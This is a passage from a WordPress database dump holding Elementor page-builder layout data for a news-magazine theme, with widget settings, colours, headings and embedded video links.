mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1457,498,'_elementor_version','0.4'),(1458,498,'_elementor_css','a:3:{s:4:\"time\";i:1508921658;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1462,500,'_elementor_edit_mode','builder'),(1463,500,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos 